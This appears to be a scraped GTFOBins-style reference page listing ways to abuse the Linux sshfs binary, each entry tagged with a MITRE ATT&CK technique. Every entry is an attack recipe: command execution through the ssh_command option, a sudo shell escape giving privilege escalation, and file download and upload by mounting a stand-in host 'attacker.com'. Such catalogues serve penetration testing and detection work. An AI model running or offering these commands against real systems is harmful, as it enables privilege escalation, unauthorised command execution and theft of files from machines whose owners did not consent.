command ExecutionPrivilege Escalation Linux sshfs -o ssh_command=/path/to/command x: /path/to/dir/ copy Contextsudo Nativecommand MITRET1059 Refsgtfobins.github.io/gtfobins/sshfs/
command Execution Linux sshfs -o ssh_command=/path/to/command x: /path/to/dir/ copy Contextunprivileged Nativecommand MITRET1059 Refsgtfobins.github.io/gtfobins/sshfs/
download File Download Linux sshfs user@attacker.com:/ /path/to/dir/ cp /path/to/dir/path/to/input-file /path/to/output-file copy Contextunprivileged Nativedownload MITRET1105 Refsgtfobins.github.io/gtfobins/sshfs/
shell ExecutionPrivilege Escalation Linux The mount dir must be writable by the invoking user. echo -e '/bin/sh </dev/tty >/dev/tty 2>/dev/tty' >/path/to/temp-file chmod +x /path/to/temp-file sshfs -o ssh_command=/path/to/temp-file x: /path/to/dir/ copy Contextsudo Nativeshell MITRET1059 Refsgtfobins.github.io/gtfobins/sshfs/
shell Execution Linux The mount dir must be writable by the invoking user. echo -e '/bin/sh </dev/tty >/dev/tty 2>/dev/tty' >/path/to/temp-file chmod +x /path/to/temp-file sshfs -o ssh_command=/path/to/temp-file x: /path/to/dir/ copy Contextunprivileged Nativeshell MITRET1059 Refsgtfobins.github.io/gtfobins/sshfs/
upload File Upload Linux sshfs user@attacker.com:/ /path/to/dir/ cp /path/to/input-file /path/to/dir/ copy Contextunprivileged Nativeupload MITRET1041 Refsgtfobins.github.io/gtfobins/sshfs/